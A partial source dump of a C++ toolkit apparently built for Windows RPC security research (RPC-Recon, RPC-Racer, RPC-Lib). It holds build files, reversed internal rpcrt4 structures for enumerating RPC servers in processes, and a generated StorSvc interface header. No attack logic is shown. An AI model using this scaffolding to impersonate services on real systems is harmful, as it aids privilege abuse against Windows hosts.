79 | NotUsing 80 | pch.h 81 | stdcpp20 82 | MultiThreadedDebug 83 | Async 84 | 85 | 86 | 87 | 88 | true 89 | 90 | 91 | 92 | 93 | Level3 94 | true 95 | true 96 | true 97 | WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions) 98 | true 99 | NotUsing 100 | pch.h 101 | stdcpp20 102 | MultiThreaded 103 | Async 104 | 105 | 106 | 107 | 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_LIB;%(PreprocessorDefinitions) 118 | true 119 | NotUsing 120 | pch.h 121 | stdcpp20 122 | MultiThreadedDebug 123 | Async 124 | 125 | 126 | 127 | 128 | true 129 | 130 | 131 | 132 | 133 | Level3 134 | true 135 | true 136 | true 137 | NDEBUG;_LIB;%(PreprocessorDefinitions) 138 | true 139 | NotUsing 140 | pch.h 141 | stdcpp20 142 | MultiThreaded 143 | Async 144 | 145 | 146 | 147 | 148 | true 149 | true 150 | true 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | -------------------------------------------------------------------------------- /RPC-Recon/QueryProcesses.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "QueryEpm.h" 3 | #include 4 | 5 | #define MAX_SIMPLE_DICT_ENTRIES 0x200 6 | 7 | #define ULONG_PTR_T ULONG_PTR 8 | #define PTR_T * 9 | 10 | #define MAX_RPC_INTERFACE_ANNOTATION 64 11 | #define SIMPLE_DICT_SMALL_ARRAY 4 12 | 13 | 14 | #define RPC_CORE_DESCRIPTION "Windows 10 64bits runtime core" 15 | #define RPC_CORE_IS_WOW64 FALSE 16 | 17 | #define ULONG_PTR_T ULONG_PTR 18 | #define PTR_T * 19 | 20 | 21 | #define MAX_RPC_INTERFACE_ANNOTATION 64 22 | #define SIMPLE_DICT_SMALL_ARRAY 4 23 | 24 | #define RPC_MAX_ENDPOINT_PROTOCOL_SIZE 0x100 25 | #define RPC_MAX_ENDPOINT_NAME_SIZE 0x100 26 | 27 | 28 | //============================================================================== 29 | // From Winnt.h 30 | // The following structures are redefined to support Wow64 ptr 31 | // 32 | struct _RTL_CRITICAL_SECTION_T; 33 | 34 | typedef struct _LIST_ENTRY_T { 35 | struct _LIST_ENTRY PTR_T Flink; 36 | struct _LIST_ENTRY PTR_T Blink; 37 | } LIST_ENTRY_T, * PLIST_ENTRY_T; 38 | 39 | 40 | typedef struct _RTL_CRITICAL_SECTION_DEBUG_T { 41 | WORD Type; 42 | WORD CreatorBackTraceIndex; 43 | struct _RTL_CRITICAL_SECTION_T PTR_T CriticalSection; 44 | LIST_ENTRY_T ProcessLocksList; 45 | DWORD EntryCount; 46 | DWORD ContentionCount; 47 | DWORD Flags; 48 | WORD CreatorBackTraceIndexHigh; 49 | WORD SpareWORD; 50 | } RTL_CRITICAL_SECTION_DEBUG_T, PTR_T PRTL_CRITICAL_SECTION_DEBUG_T; 51 | 52 | typedef struct _RTL_CRITICAL_SECTION_T { 53 | PRTL_CRITICAL_SECTION_DEBUG_T DebugInfo; 54 | // 55 | // The following three fields control entering and exiting the critical 56 | // section for the resource 57 | // 58 | LONG LockCount; 59 | LONG RecursionCount; 60 | VOID PTR_T OwningThread; // from the thread's ClientId->UniqueThread 61 | VOID PTR_T LockSemaphore; 62 | VOID PTR_T SpinCount; // force size on 64-bit systems when packed 63 | } RTL_CRITICAL_SECTION_T, PTR_T PRTL_CRITICAL_SECTION_T; 64 | 65 | //============================================================================== 66 | // From RpcDceP.h 67 | // 68 | typedef struct _RPC_DISPATCH_TABLE_T { 69 | UINT DispatchTableCount; 70 | RPC_DISPATCH_FUNCTION PTR_T DispatchTable; 71 | ULONG_PTR_T Reserved; 72 | } RPC_DISPATCH_TABLE_T, PTR_T PRPC_DISPATCH_TABLE_T; 73 | 74 | typedef struct _RPC_PROTSEQ_ENDPOINT_T { 75 | UCHAR PTR_T RpcProtocolSequence; 76 | UCHAR PTR_T Endpoint; 77 | } RPC_PROTSEQ_ENDPOINT_T, PTR_T PRPC_PROTSEQ_ENDPOINT_T; 78 | 79 | typedef struct _RPC_SERVER_INTERFACE_T { 80 | UINT Length; 81 | RPC_IF_ID InterfaceId; 82 | RPC_IF_ID TransferSyntax; 83 | PRPC_DISPATCH_TABLE_T DispatchTable; 84 | UINT RpcProtseqEndpointCount; 85 | PRPC_PROTSEQ_ENDPOINT_T RpcProtseqEndpoint; 86 | RPC_MGR_EPV PTR_T DefaultManagerEpv; 87 | void const PTR_T InterpreterInfo; 88 | UINT Flags; 89 | } RPC_SERVER_INTERFACE_T, PTR_T PRPC_SERVER_INTERFACE_T; 90 | 91 | 92 | typedef struct _NDR_EXPR_DESC_T 93 | { 94 | const unsigned short PTR_T pOffset; 95 | const unsigned char PTR_T pFormatExpr; 96 | } NDR_EXPR_DESC_T; 97 | 98 | 99 | /* 100 | * MIDL Stub Descriptor 101 | */ 102 | typedef struct _MIDL_STUB_DESC_T { 103 | void PTR_T RpcInterfaceInformation; 104 | void PTR_T pfnAllocate; 105 | void PTR_T pfnFree; 106 | void PTR_T pAutoHandle; 107 | const VOID PTR_T apfnNdrRundownRoutines; 108 | const VOID PTR_T aGenericBindingRoutinePairs; 109 | const VOID PTR_T apfnExprEval; 110 | const VOID PTR_T aXmitQuintuple; 111 | const unsigned char PTR_T pFormatTypes; 112 | int fCheckBounds; 113 | /* Ndr library version. */ 114 | unsigned long Version; 115 | VOID PTR_T pMallocFreeStruct; 116 | long MIDLVersion; 117 | const COMM_FAULT_OFFSETS PTR_T CommFaultOffsets; 118 | // New fields for version 3.0+ 119 | const VOID PTR_T aUserMarshalQuadruple; 120 | // Notify routines - added for NT5, MIDL 5.0 121 | const VOID PTR_T NotifyRoutineTable; 122 | /* 123 | * Reserved for future use. 124 | */ 125 | ULONG_PTR_T mFlags; 126 | // International support routines - added for 64bit post NT5 127 | const VOID PTR_T CsRoutineTables; 128 | void PTR_T ProxyServerInfo; 129 | const NDR_EXPR_DESC_T PTR_T pExprInfo; 130 | // Fields up to now present in win2000 release. 131 | } MIDL_STUB_DESC_T, PTR_T PMIDL_STUB_DESC_T; 132 | 133 | 134 | /* 135 | * Server Interpreter's information strucuture. 136 | */ 137 | typedef struct _MIDL_SERVER_INFO_T { 138 | PMIDL_STUB_DESC_T pStubDesc; 139 | const VOID PTR_T PTR_T DispatchTable; 140 | const unsigned char PTR_T ProcString; 141 | const unsigned short PTR_T FmtStringOffset; 142 | const VOID PTR_T PTR_T ThunkTable; 143 | RPC_IF_ID PTR_T pTransferSyntax; 144 | ULONG_PTR_T nCount; 145 | VOID PTR_T pSyntaxInfo; 146 | } MIDL_SERVER_INFO_T, PTR_T PMIDL_SERVER_INFO_T; 147 | 148 | //============================================================================== 149 | // Common private structures from rpctr4.dll. 150 | // These structures seems to be constant on all the runtime versions. 151 | // 152 | #pragma pack(1) 153 | typedef struct _SIMPLE_DICT_T { 154 | VOID PTR_T PTR_T pArray; 155 | UINT ArraySizeInBytes; //to change : countof array elements 156 | UINT NumberOfEntries; 157 | VOID PTR_T SmallArray[SIMPLE_DICT_SMALL_ARRAY]; 158 | }SIMPLE_DICT_T, PTR_T PSIMPLE_DICT_T; 159 | 160 | typedef struct _QUEUE_T { 161 | VOID PTR_T Tail; 162 | VOID PTR_T Head; 163 | ULONG Lentgh; 164 | VOID PTR_T SmallArray[SIMPLE_DICT_SMALL_ARRAY]; 165 | }QUEUE_T; 166 | 167 | typedef struct _MUTEX_T { 168 | RTL_CRITICAL_SECTION_T CriticalSection; 169 | }MUTEX_T; 170 | 171 | typedef struct _EVENT_T { 172 | ULONG hEvent; 173 | } EVENT_T; 174 | 175 | #pragma pack() 176 | 177 | #define RPC_ADDRESS_TYPE_DG 0x400000 178 | #define RPC_ADDRESS_TYPE_LRPC 0x800000 179 | #define RPC_ADDRESS_TYPE_OSF 0x800 180 | 181 | #pragma pack(1) 182 | typedef struct _RPC_SERVER_T { 183 | MUTEX_T Mutex; 184 | ULONG __bIslistening; 185 | ULONG bIsListening; 186 | ULONG MinimumCallThreads; 187 | ULONG Wait; 188 | ULONG OutCalls; 189 | ULONG Unk1; 190 | ULONG InCalls; 191 | ULONG Unk2; 192 | SIMPLE_DICT_T AddressDict; 193 | ULONG lAvailableCalls; 194 | ULONG Unk3; 195 | SIMPLE_DICT_T _ProtSeqQueue; 196 | ULONG Unk4[8]; 197 | ULONG OutPackets; 198 | ULONG Unk5; 199 | MUTEX_T Mutex2; 200 | ULONG MaxCalls; 201 | ULONG Unk6; 202 | VOID PTR_T hEvent; 203 | ULONG Unk7[4]; 204 | SIMPLE_DICT_T InterfaceDict; 205 | ULONG _bIsListening; 206 | ULONG bIsMaxCalls1234; 207 | ULONG Unk8[6]; 208 | ULONG InPackets; 209 | ULONG Unk9; 210 | RPC_FORWARD_FUNCTION PTR_T pRpcForwardFunction; 211 | ULONG Unk10[6]; 212 | SIMPLE_DICT_T AuthenInfoDict; 213 | LIST_ENTRY_T RpcIfGroupListEntry; 214 | ULONG PTR_T __SRWLock; 215 | LIST_ENTRY_T field_1E0; 216 | }RPC_SERVER_T, PTR_T PRPC_SERVER_T; 217 | 218 | typedef struct _RPC_INTERFACE_T 219 | { 220 | PRPC_SERVER_T pRpcServer; 221 | ULONG Flags; 222 | ULONG Unk1; 223 | MUTEX_T Mutex; 224 | ULONG EpMapperFlags; 225 | ULONG Unk2; 226 | RPC_MGR_EPV PTR_T pMgrEpv; 227 | RPC_IF_CALLBACK_FN PTR_T IfCallbackFn; 228 | RPC_SERVER_INTERFACE_T RpcServerInterface; 229 | PMIDL_SYNTAX_INFO pSyntaxInfo; 230 | VOID PTR_T pTransfertSyntaxes; 231 | ULONG TransfertSyntaxesCount; 232 | ULONG __Field_C4; 233 | ULONG NbTypeManager; 234 | ULONG MaxRpcSize; 235 | UUID_VECTOR PTR_T pUuidVector; 236 | SIMPLE_DICT_T RpcInterfaceManagerDict; 237 | UCHAR Annotation[MAX_RPC_INTERFACE_ANNOTATION]; 238 | ULONG IsCallSizeLimitReached; 239 | ULONG currentNullManagerCalls; 240 | ULONG __Field_150; 241 | ULONG __Field_154; 242 | ULONG __Field_158; 243 | ULONG SecurityCallbackInProgress; 244 | ULONG SecurityCacheEntry; 245 | ULONG field_164; 246 | VOID PTR_T __SecurityCacheEntries[16]; 247 | SIMPLE_DICT_T FwEpDict; 248 | ULONG Unk3[6]; 249 | struct RPCP_INTERFACE_GROUP PTR_T pRpcpInterfaceGroup; 250 | }RPC_INTERFACE_T, PTR_T PRPC_INTERFACE_T; 251 | 252 | #define RPC_ADDRESS_TYPE_DG 0x400000 253 | #define RPC_ADDRESS_TYPE_LRPC 0x800000 254 | #define RPC_ADDRESS_TYPE_OSF 0x800 255 | 256 | typedef struct _RPC_ADDRESS_T { 257 | VOID PTR_T pVtable; 258 | ULONG Magic; 259 | ULONG TypeOfAddress; 260 | ULONG ReferenceCounter; 261 | ULONG Unk1[3]; 262 | WCHAR PTR_T Name; 263 | WCHAR PTR_T Protocole; 264 | WCHAR PTR_T Address; 265 | ULONG bNamed; 266 | ULONG EpAddAddressFlag; 267 | SIMPLE_DICT_T __LRPCSassociationSimpleDict; 268 | ULONG __Field_68; 269 | ULONG Unk3; 270 | ULONG NbActiveCalls; 271 | ULONG __Field_74; 272 | ULONG Unk4[6]; 273 | ULONG __Field_90; 274 | MUTEX_T Mutex; 275 | }RPC_ADDRESS_T; 276 | 277 | #pragma pack() 278 | void QueryProcesses(map>>& RpcServers); 279 | void CompareProcsResults(map>>& ProcsEarly, map>>& ProcsLate, wstringstream& OutStream); -------------------------------------------------------------------------------- /RPC-Racer/StorSvc_h.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file contains the definitions for the interfaces */ 4 | 5 | 6 | /* File created by MIDL compiler version 8.01.0628 */ 7 | /* at Tue Jan 19 05:14:07 2038 8 | */ 9 | /* Compiler settings for StorSvc.idl: 10 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0628 11 | protocol : all , ms_ext, c_ext, robust 12 | error checks: allocation ref bounds_check enum stub_data 13 | VC __declspec() decoration level: 14 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 15 | DECLSPEC_UUID(), MIDL_INTERFACE() 16 | */ 17 | /* @@MIDL_FILE_HEADING( ) */ 18 | 19 | 20 | 21 | /* verify that the version is high enough to compile this file*/ 22 | #ifndef __REQUIRED_RPCNDR_H_VERSION__ 23 | #define __REQUIRED_RPCNDR_H_VERSION__ 500 24 | #endif 25 | 26 | #include "rpc.h" 27 | #include "rpcndr.h" 28 | 29 | #ifndef __RPCNDR_H_VERSION__ 30 | #error this stub requires an updated version of 31 | #endif /* __RPCNDR_H_VERSION__ */ 32 | 33 | 34 | #ifndef __StorSvc_h_h__ 35 | #define __StorSvc_h_h__ 36 | 37 | #if defined(_MSC_VER) && (_MSC_VER >= 1020) 38 | #pragma once 39 | #endif 40 | 41 | #ifndef DECLSPEC_XFGVIRT 42 | #if defined(_CONTROL_FLOW_GUARD_XFG) 43 | #define DECLSPEC_XFGVIRT(base, func) __declspec(xfg_virtual(base, func)) 44 | #else 45 | #define DECLSPEC_XFGVIRT(base, func) 46 | #endif 47 | #endif 48 | 49 | /* Forward Declarations */ 50 | 51 | /* header files for imported files */ 52 | #include "wtypesbase.h" 53 | 54 | #ifdef __cplusplus 55 | extern "C"{ 56 | #endif 57 | 58 | 59 | #ifndef __StorSvc_INTERFACE_DEFINED__ 60 | #define __StorSvc_INTERFACE_DEFINED__ 61 | 62 | /* interface StorSvc */ 63 | /* [version][uuid] */ 64 | 65 | typedef 66 | enum _STORAGE_DEVICE_TYPE 67 | { 68 | STORAGE_DEVICE_INTERNAL = 0, 69 | STORAGE_DEVICE_EXTERNAL = 0x1, 70 | STORAGE_DEVICE_SD = 0x1, 71 | STORAGE_DEVICE_MAX = 0x2 72 | } STORAGE_DEVICE_TYPE; 73 | 74 | typedef enum _STORAGE_DEVICE_TYPE *PSTORAGE_DEVICE_TYPE; 75 | 76 | typedef 77 | enum _STORAGE_SETTING 78 | { 79 | STORAGE_SETTING_CARD_DISABLED = 0x1, 80 | STORAGE_SETTING_WRITE_ACCESS = 0x2, 81 | STORAGE_SETTING_APP_PAIRING_STATUS = 0x3 82 | } STORAGE_SETTING; 83 | 84 | typedef enum _STORAGE_SETTING *PSTORAGE_SETTING; 85 | 86 | typedef 87 | enum _STORAGE_PRESENCE_STATE 88 | { 89 | STORAGE_PRESENCE_MOUNTED = 0, 90 | STORAGE_PRESENCE_PREDISMOUNTED = 0x1, 91 | STORAGE_PRESENCE_DISMOUNTED = 0x2 92 | } STORAGE_PRESENCE_STATE; 93 | 94 | typedef enum _STORAGE_PRESENCE_STATE *PSTORAGE_PRESENCE_STATE; 95 | 96 | typedef 97 | enum _STORAGE_DISMOUNT_REASON 98 | { 99 | STORAGE_DISMOUNT_NONE = 0, 100 | STORAGE_DISMOUNT_SAFE_REMOVAL = 0x1, 101 | STORAGE_DISMOUNT_SURPRISE_REMOVAL = 0x2, 102 | STORAGE_DISMOUNT_IO_FAILURE = 0x3, 103 | STORAGE_DISMOUNT_BUSY = 0x4 104 | } STORAGE_DISMOUNT_REASON; 105 | 106 | typedef enum _STORAGE_DISMOUNT_REASON *PSTORAGE_DISMOUNT_REASON; 107 | 108 | typedef 109 | enum _STORAGE_FREE_SPACE_STATE 110 | { 111 | STORAGE_SPACE_NORMAL = 0, 112 | STORAGE_SPACE_LOW = 0x1 113 | } STORAGE_FREE_SPACE_STATE; 114 | 115 | typedef enum _STORAGE_FREE_SPACE_STATE *PSTORAGE_FREE_SPACE_STATE; 116 | 117 | typedef 118 | enum _STORAGE_TEMP_CLEANUP_STATE 119 | { 120 | STORAGE_TEMP_NORMAL = 0, 121 | STORAGE_TEMP_CLEANUP = 0x1 122 | } STORAGE_TEMP_CLEANUP_STATE; 123 | 124 | typedef enum _STORAGE_TEMP_CLEANUP_STATE *PSTORAGE_TEMP_CLEANUP_STATE; 125 | 126 | typedef 127 | enum _STORAGE_DEVICE_PROPERTIES 128 | { 129 | STORAGE_PROPERTY_NONE = 0, 130 | STORAGE_PROPERTY_REMOVABLE = 0x1 131 | } STORAGE_DEVICE_PROPERTIES; 132 | 133 | typedef enum _STORAGE_DEVICE_PROPERTIES *PSTORAGE_DEVICE_PROPERTIES; 134 | 135 | typedef 136 | enum _STORAGE_VOLUME_STATUS 137 | { 138 | STORAGE_STATUS_NORMAL = 0, 139 | STORAGE_STATUS_DIRTY = 0x1, 140 | STORAGE_STATUS_UNFORMATTED = 0x2, 141 | STORAGE_STATUS_NEW_CARD = 0x4, 142 | STORAGE_STATUS_DISABLED = 0x8, 143 | STORAGE_STATUS_READ_ONLY = 0x10, 144 | STORAGE_STATUS_WRITE_FAILURE = 0x20 145 | } STORAGE_VOLUME_STATUS; 146 | 147 | typedef enum _STORAGE_VOLUME_STATUS *PSTORAGE_VOLUME_STATUS; 148 | 149 | typedef 150 | enum _STORAGE_APP_PAIRING_STATUS 151 | { 152 | STORAGE_APP_PAIRING_DIFFERENT_DEVICE = 0x1, 153 | STORAGE_APP_PAIRING_SAME_DEVICE = 0x2, 154 | STORAGE_APP_PAIRING_NO_DEVICE = 0x4 155 | } STORAGE_APP_PAIRING_STATUS; 156 | 157 | typedef enum _STORAGE_APP_PAIRING_STATUS *PSTORAGE_APP_PAIRING_STATUS; 158 | 159 | typedef struct _STORAGE_DEVICE_INFO 160 | { 161 | unsigned int Size; 162 | wchar_t PathName[ 260 ]; 163 | STORAGE_DEVICE_PROPERTIES DeviceProperties; 164 | STORAGE_PRESENCE_STATE PresenceState; 165 | STORAGE_DISMOUNT_REASON DismountReason; 166 | STORAGE_VOLUME_STATUS VolumeStatus; 167 | STORAGE_FREE_SPACE_STATE FreeSpaceState; 168 | STORAGE_TEMP_CLEANUP_STATE TempCleanupState; 169 | GUID StorageId; 170 | STORAGE_APP_PAIRING_STATUS AppPairingStatus; 171 | unsigned __int64 ReservedSize; 172 | wchar_t FriendlyName[ 260 ]; 173 | unsigned int BusType; 174 | unsigned int FileSystemType; 175 | unsigned int PersistentVolumeState; 176 | } STORAGE_DEVICE_INFO; 177 | 178 | typedef struct _STORAGE_DEVICE_INFO *PSTORAGE_DEVICE_INFO; 179 | 180 | long SvcMountVolume( 181 | /* [in] */ handle_t IDL_handle); 182 | 183 | long SvcDismountVolume( 184 | /* [in] */ handle_t IDL_handle); 185 | 186 | long SvcFormatVolume( 187 | /* [in] */ handle_t IDL_handle); 188 | 189 | long SvcGetStorageInstanceCount( 190 | /* [in] */ handle_t IDL_handle, 191 | /* [in] */ STORAGE_DEVICE_TYPE DeviceType, 192 | /* [out] */ LPDWORD DevicesCount); 193 | 194 | long SvcGetStorageDeviceInfo( 195 | /* [in] */ handle_t IDL_handle, 196 | /* [in] */ STORAGE_DEVICE_TYPE DeviceType, 197 | /* [in] */ DWORD DeviceIndex, 198 | /* [out][in] */ STORAGE_DEVICE_INFO *DeviceInfo); 199 | 200 | long CleanupItem( 201 | /* [in] */ handle_t IDL_handle); 202 | 203 | long SvcRebootToFlashingMode( 204 | /* [in] */ handle_t IDL_handle); 205 | 206 | long SvcRebootToUosFlashing( 207 | /* [in] */ handle_t IDL_handle); 208 | 209 | long SvcFinalizeVolume( 210 | /* [in] */ handle_t IDL_handle); 211 | 212 | long SvcGetStorageSettings( 213 | /* [in] */ handle_t IDL_handle, 214 | /* [in] */ STORAGE_DEVICE_TYPE DeviceType, 215 | /* [in] */ DWORD DeviceIndex, 216 | /* [in] */ STORAGE_SETTING SettingsType, 217 | /* [out] */ LPDWORD SettingsValue); 218 | 219 | long SvcResetStoragePolicySettings( 220 | /* [in] */ handle_t IDL_handle); 221 | 222 | long SvcSetStorageSettings( 223 | /* [in] */ handle_t IDL_handle); 224 | 225 | long SvcTriggerStorageCleanup( 226 | /* [in] */ handle_t IDL_handle); 227 | 228 | long SvcTriggerLowStorageNotification( 229 | /* [in] */ handle_t IDL_handle); 230 | 231 | long SvcMoveFileInheritSecurity( 232 | /* [in] */ handle_t IDL_handle); 233 | 234 | long SvcScanVolume( 235 | /* [in] */ handle_t IDL_handle); 236 | 237 | long SvcProcessStorageCardChange( 238 | /* [in] */ handle_t IDL_handle); 239 | 240 | long SvcProvisionForAppInstall( 241 | /* [in] */ handle_t IDL_handle); 242 | 243 | long SvcGetStorageInstanceCountForMaps( 244 | /* [in] */ handle_t IDL_handle); 245 | 246 | long SvcGetStoragePolicySettings( 247 | /* [in] */ handle_t IDL_handle); 248 | 249 | long SvcSetStoragePolicySettings( 250 | /* [in] */ handle_t IDL_handle); 251 | 252 | long SvcTriggerStoragePolicies( 253 | /* [in] */ handle_t IDL_handle); 254 | 255 | long SvcTriggerStorageOptimization( 256 | /* [in] */ handle_t IDL_handle); 257 | 258 | long SvcPredictStorageHealth( 259 | /* [in] */ handle_t IDL_handle); 260 | 261 | long SvcGetLastFailedSaveLocationPath( 262 | /* [in] */ handle_t IDL_handle); 263 | 264 | long SvcExecuteRemoveUserFiles( 265 | /* [in] */ handle_t IDL_handle); 266 | 267 | long SvcExecuteDehydrateUserFiles( 268 | /* [in] */ handle_t IDL_handle); 269 | 270 | long SvcGetStorageDeviceSize( 271 | /* [in] */ handle_t IDL_handle); 272 | 273 | long SvcGetStoragePolicyDefaultValue( 274 | /* [in] */ handle_t IDL_handle); 275 | 276 | long SvcGetStorageDeviceLowDiskState( 277 | /* [in] */ handle_t IDL_handle); 278 | 279 | long SvcGetStorageDeviceLowDiskState2( 280 | /* [in] */ handle_t IDL_handle); 281 | 282 | long SvcSilentCleanupTaskSetEnabledState( 283 | /* [in] */ handle_t IDL_handle); 284 | 285 | long SvcSilentCleanupTaskGetEnabledState( 286 | /* [in] */ handle_t IDL_handle); 287 | 288 | long SvcGetStoragePoliciesLastTriggerTime( 289 | /* [in] */ handle_t IDL_handle); 290 | 291 | long SvcSetStoragePoliciesLastTriggerTime( 292 | /* [in] */ handle_t IDL_handle); 293 | 294 | long SvcGetSmartAttributes( 295 | /* [in] */ handle_t IDL_handle); 296 | 297 | 298 | 299 | extern RPC_IF_HANDLE StorSvc_v0_0_c_ifspec; 300 | extern RPC_IF_HANDLE StorSvc_v0_0_s_ifspec; 301 | #endif /* __StorSvc_INTERFACE_DEFINED__ */ 302 | 303 | /* Additional Prototypes for ALL interfaces */ 304 | 305 | /* end of Additional Prototypes */ 306 | 307 | #ifdef __cplusplus 308 | } 309 | #endif 310 | 311 | #endif 312 | 313 | 314 | -------------------------------------------------------------------------------- /RPC-Recon/RPC-Recon.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 17.0 23 | Win32Proj 24 | {060d2759-1d6e-493c-97a2-2f743309f285} 25 | RPCRecon 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | $(SolutionDir);$(IncludePath) 75 | $(OutDir);$(LibraryPath) 76 | 77 | 78 | $(SolutionDir);$(IncludePath) 79 | $(OutDir);$(LibraryPath) 80 | 81 | 82 | $(SolutionDir);$(IncludePath) 83 | $(OutDir);$(LibraryPath) 84 | 85 | 86 | $(SolutionDir);$(IncludePath) 87 | $(OutDir);$(LibraryPath) 88 | 89 | 90 | 91 | Level3 92 | true 93 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 94 | true 95 | stdcpp20 96 | MultiThreadedDebug 97 | Async 98 | 99 | 100 | Console 101 | true 102 | Rpcrt4.lib;Taskschd.lib;RPC-Lib.lib;%(AdditionalDependencies) 103 | 104 | 105 | 106 | 107 | Level3 108 | true 109 | true 110 | true 111 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 112 | true 113 | stdcpp20 114 | MultiThreaded 115 | Async 116 | 117 | 118 | Console 119 | true 120 | true 121 | true 122 | Rpcrt4.lib;Taskschd.lib;RPC-Lib.lib;%(AdditionalDependencies) 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 130 | true 131 | stdcpp20 132 | MultiThreadedDebug 133 | Async 134 | 135 | 136 | Console 137 | true 138 | Rpcrt4.lib;Taskschd.lib;RPC-Lib.lib;%(AdditionalDependencies) 139 | 140 | 141 | 142 | 143 | Level3 144 | true 145 | true 146 | true 147 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 148 | true 149 | stdcpp20 150 | MultiThreaded 151 | Async 152 | 153 | 154 | Console 155 | true 156 | true 157 | true 158 | Rpcrt4.lib;Taskschd.lib;RPC-Lib.lib;%(AdditionalDependencies) 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | -------------------------------------------------------------------------------- /RPC-Racer/RPC-Racer.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 17.0 23 | Win32Proj 24 | {240d4c3f-c777-4232-8fd9-69663699a8d8} 25 | RPCRacer 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | $(SolutionDir);$(IncludePath) 75 | $(OutDir);$(LibraryPath) 76 | 77 | 78 | $(SolutionDir);$(IncludePath) 79 | $(OutDir);$(LibraryPath) 80 | 81 | 82 | $(SolutionDir);$(IncludePath) 83 | $(OutDir);$(LibraryPath) 84 | 85 | 86 | $(SolutionDir);$(IncludePath) 87 | $(OutDir);$(LibraryPath) 88 | 89 | 90 | 91 | Level3 92 | true 93 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 94 | true 95 | stdcpp20 96 | MultiThreadedDebug 97 | Async 98 | 99 | 100 | Console 101 | true 102 | rpcrt4.lib;bits.lib;Taskschd.lib;RPC-Lib.lib;%(AdditionalDependencies) 103 | 104 | 105 | 106 | 107 | Level3 108 | true 109 | true 110 | true 111 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 112 | true 113 | stdcpp20 114 | MultiThreaded 115 | Async 116 | 117 | 118 | Console 119 | true 120 | true 121 | true 122 | rpcrt4.lib;bits.lib;Taskschd.lib;RPC-Lib.lib;%(AdditionalDependencies) 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 130 | true 131 | stdcpp20 132 | MultiThreadedDebug 133 | Async 134 | 135 | 136 | Console 137 | true 138 | rpcrt4.lib;bits.lib;Taskschd.lib;RPC-Lib.lib;%(AdditionalDependencies) 139 | 140 | 141 | 142 | 143 | Level3 144 | true 145 | true 146 | true 147 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 148 | true 149 | stdcpp20 150 | MultiThreaded 151 | Async 152 | 153 | 154 | Console 155 | true 156 | true 157 | true 158 | rpcrt4.lib;bits.lib;Taskschd.lib;RPC-Lib.lib;%(AdditionalDependencies) 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | None 168 | None 169 | None 170 | None 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | -------------------------------------------------------------------------------- /RPC-Lib/Utils.cpp: -------------------------------------------------------------------------------- 1 | #include "Utils.h" 2 | 3 | SC_HANDLE g_ScHandle = nullptr; 4 | 5 | // Get description of error code for more informative logging 6 | string TranslateCode(DWORD ErrorCode) 7 | { 8 | string errorMessage; 9 | LPSTR messageBuffer; 10 | HMODULE source = GetModuleHandleW(L"NTDLL.DLL"); 11 | 12 | DWORD bufferLength = FormatMessageA( 13 | FORMAT_MESSAGE_ALLOCATE_BUFFER | 14 | FORMAT_MESSAGE_FROM_SYSTEM | 15 | FORMAT_MESSAGE_FROM_HMODULE, 16 | source, 17 | ErrorCode, 18 | MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), 19 | reinterpret_cast(&messageBuffer), 20 | 0, 21 | NULL); 22 | 23 | if (0 != bufferLength) 24 | { 25 | errorMessage.assign(messageBuffer); 26 | LocalFree(messageBuffer); 27 | } 28 | return errorMessage; 29 | } 30 | 31 | // Add more information to the error message before throwing 32 | void ThrowException(const char* Message, const DWORD ErrorCode) 33 | { 34 | string codeMeaning = TranslateCode(ErrorCode); 35 | std::stringstream messageStream; 36 | messageStream << Message; 37 | messageStream << " 0x"; 38 | messageStream << std::hex << ErrorCode << std::dec << " " << codeMeaning; 39 | const string errorMessage = messageStream.str(); 40 | throw runtime_error(errorMessage.c_str()); 41 | } 42 | 43 | // Convert the interface UUID along with the version number to std::wstring 44 | wstring IfIdToWstring(const RPC_IF_ID* IfID) 45 | { 46 | RPC_WSTR stringBuffer = nullptr; 47 | 